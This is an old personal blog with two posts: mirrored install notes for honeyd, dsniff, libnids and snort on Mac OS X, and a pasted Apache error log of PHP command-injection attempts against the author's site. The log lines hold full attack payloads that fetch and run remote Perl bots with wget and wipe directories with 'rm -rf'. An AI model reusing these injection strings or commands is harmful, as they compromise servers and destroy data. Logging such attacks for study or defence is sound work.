janeiro 13, 2005
installing honeyd and dsniff on os x

a few urls that helped me get honeyd/dsniff etc installed on my mac:
- http://www.linville.org/dsniff.html
- http://www.os3.nl/~nan03/honeyd.howto

note the stuff below here is cut-and-paste directly from these websites, i did not create it, but i am pseudo-mirroring it just in case it goes away, cause i'll probably need it again someday soon...

============================================
============================================
from http://www.os3.nl/~nan03/honeyd.howto :

INSTALLING HONEYD IN 10 STEPS on MAC OS X

Take a look at the official Honeyd site.

http://www.honeyd.org

1 - download Honeyd

2 - download the apropriate libraries:

libevent
libpcap
libdnet

3 - download python 2.3.x

4 - Untar and do a...

./configure --prefix=
make
make install

...for the three libraries and python. Use the prefix parameter to put everything
into one specific location, so you know where to find everything. It keeps your system clean.

5 - add the python bin dir in your executable path, like:

export PATH=/bin:$PATH

6- Enter your libevent dir:

cd /include
cp ../lib/libevent.a .
ranlib libevent.a (Thanks Maarten Carels)

7 - ./configure honeyd with the apropriate --with-libnet=.. etc.

8 - Edit the Makefile and make these changes:

- Scroll to the bottom and find this line:

cp .libs/libtmp$@.so $@

- change it like this:

cp .libs/libtmp$@.a $@ (Thanks Daniel Hilster)

9 - make

10 - make install


==========================================
==========================================
from http://www.linville.org/dsniff.html :

Aside from dsniff itself, these utilities are quite useful for writing lowlevel network utilities, investigating and maintaining network security. I use them fairly regularly in industry to test and instrument equipment in my line of work.

If you have any problems, chances are it's my fault. I wrote this up from memory and haven't had time to check it yet. - Aaron Linville



Notes: Setup directories that files will be installed into.

mkdir -p /usr/local/sbin

mkdir -p /usr/lib
mkdir -p /usr/local/lib

mkdir -p /usr/local/
mkdir -p /usr/local/include
mkdir -p /usr/local/include/net

mkdir -p /usr/include
mkdir -p /usr/include/libnet



Notes: Libpcap is a system-independent interface for user-level packet capture. It provides a portable framework for low-level monitoring.

wget http://www.tcpdump.org/release/libpcap-0.6.2.tar.gz

tar -xvzf libpcap-0.6.2.tar.gz

cd libpcap-0.6.2

cp /usr/libexec/config.guess ./
cp /usr/libexec/config.sub ./

./configure

make

cp libpcap.a /usr/local/lib/

cp pcap.h /usr/local/include/
cp pcap-namedb.h /usr/local/include/
cp pcap-int.h /usr/local/include/

cp net/bpf.h /usr/local/include/net/

cp pcap.3 /usr/local/man/man3/

ranlib /usr/local/lib/libpcap.a



Notes: Libnet is an API for low level packet writing and handling. You can create packets at the IP layer and the link layer.

wget http://www.packetfactory.net/libnet/dist/libnet-1.0.2.tgz

tar -xvzf libnet-1.0.2.tgz

cd libnet-1.0.2

cp /usr/libexec/config.guess ./
cp /usr/libexec/config.sub ./

./configure

cp libnet-config /usr/bin
cp include/libnet.h /usr/include
cp include/libnet-* /usr/include/libnet/

cp lib/libnet.a /usr/lib

cp doc/libnet.3 /usr/local/man/man3

cd /usr/lib
ln -f -s libnet.a libpwrite.a

ranlib /usr/lib/libnet.a



Notes: Libnids provides assembly of TCP segments into TCP streams, IP deframentation, and TCP port scan detection. NIDS stands for Network Intrusion Detection System.

wget http://www.packetfactory.net/Projects/Libnids/dist/libnids-1.16.tar.gz

tar -xvzf libnids-1.16.tar.gz

cd libnids-1.16

./configure

make
make install

ranlib /usr/local/lib/libnids.a



Notes: DSniff really only does one thing, and that is to sniff passwords, the other utilities do have real-world application though. This package includes the following subutilities: arpspoof, dnsspoof, filesnarf, macof, mailsnarf, msgsnarf, sshmitm, tcpkill, tcpnice, urlsnarf, and webmitm.

wget http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

tar -xvzf dsniff-2.3.tar.gz

cd dsniff-2.3

./configure --with-openssl=/usr/local/ssl

make

make install



Notes: This is an optional package. It is used for actively detecting attacks within your network. Its usefullness comes from the fact that you can use it to detect attacks that are not directed at your machine.

wget http://www.snort.org/Files/snort-1.7.tar.gz

tar -xvzf snort-1.7.tar.gz

cd snort-1.7

cp /usr/libexec/config.guess ./
cp /usr/libexec/config.sub ./

./configure --with-openssl=/usr/local/ssl

make
make install

Posted by skp at 02:56 PM
janeiro 06, 2005
everyone needs a little webapp worm

hah check this out... apache error_log is always amusing

[Thu Jan 6 08:00:03 2005] [error] [client 217.160.142.237] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Nov 2 09:47:00 2004] [error] [client 216.217.36.130] File does not exist: /var/www/htdocs/howto/archives/cat_code.html

[Mon Dec 27 04:39:21 2004] [error] [client 82.255.84.247] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.htmljlk

[Tue Dec 28 23:38:43 2004] [error] [client 217.199.172.79] (63)File name too long: access to /howto/archives/cat_code.html&rush=echo _START_; cd /tmp; rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 failed

[Wed Dec 29 06:03:52 2004] [error] [client 80.241.162.247] (63)File name too long: access to /howto/archives/cat_code.html&rush=echo _START_; cd /tmp; rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 failed

[Wed Dec 29 07:08:38 2004] [error] [client 67.15.52.34] (63)File name too long: access to /howto/archives/cat_code.html&rush=echo _START_; cd /tmp; rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 failed

[Wed Dec 29 07:16:40 2004] [error] [client 69.57.173.218] (63)File name too long: access to /howto/archives/cat_code.html&rush=echo _START_; cd /tmp; rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 69.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 failed

[Thu Dec 30 00:35:51 2004] [error] [client 64.240.156.248] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;mkdir .temp22;cd .temp22;wget http://www.quasi-sane.com/pics/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Thu Dec 30 01:48:14 2004] [error] [client 217.160.109.198] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Thu Dec 30 03:05:26 2004] [error] [client 217.172.182.137] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Thu Dec 30 03:33:22 2004] [error] [client 82.165.33.199] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Thu Dec 30 04:17:02 2004] [error] [client 213.229.60.50] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Thu Dec 30 07:18:22 2004] [error] [client 193.158.85.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Thu Dec 30 08:00:00 2004] [error] [client 217.160.109.198] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Thu Dec 30 09:07:09 2004] [error] [client 212.112.232.149] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Thu Dec 30 13:52:15 2004] [error] [client 217.172.182.137] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Thu Dec 30 15:23:20 2004] [error] [client 217.172.182.137] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Thu Dec 30 15:34:53 2004] [error] [client 217.160.109.198] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Thu Dec 30 16:15:34 2004] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Thu Dec 30 16:17:11 2004] [error] [client 82.165.33.199] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 00:44:25 2004] [error] [client 217.20.117.62] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 01:46:53 2004] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 04:45:42 2004] [error] [client 80.190.251.253] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 05:50:16 2004] [error] [client 80.143.128.51] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 08:24:32 2004] [error] [client 217.160.109.18] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 09:52:30 2004] [error] [client 217.160.142.237] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 13:22:10 2004] [error] [client 64.240.156.248] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;mkdir .temp22;cd .temp22;wget http://www.quasi-sane.com/pics/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 14:10:05 2004] [error] [client 62.75.160.169] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 14:35:25 2004] [error] [client 212.69.172.130] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 21:21:39 2004] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 22:46:27 2004] [error] [client 217.172.182.137] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Fri Dec 31 23:56:05 2004] [error] [client 217.160.207.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 01:17:49 2005] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 01:48:16 2005] [error] [client 80.190.251.253] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 02:19:26 2005] [error] [client 217.160.142.237] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 02:38:34 2005] [error] [client 217.160.207.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
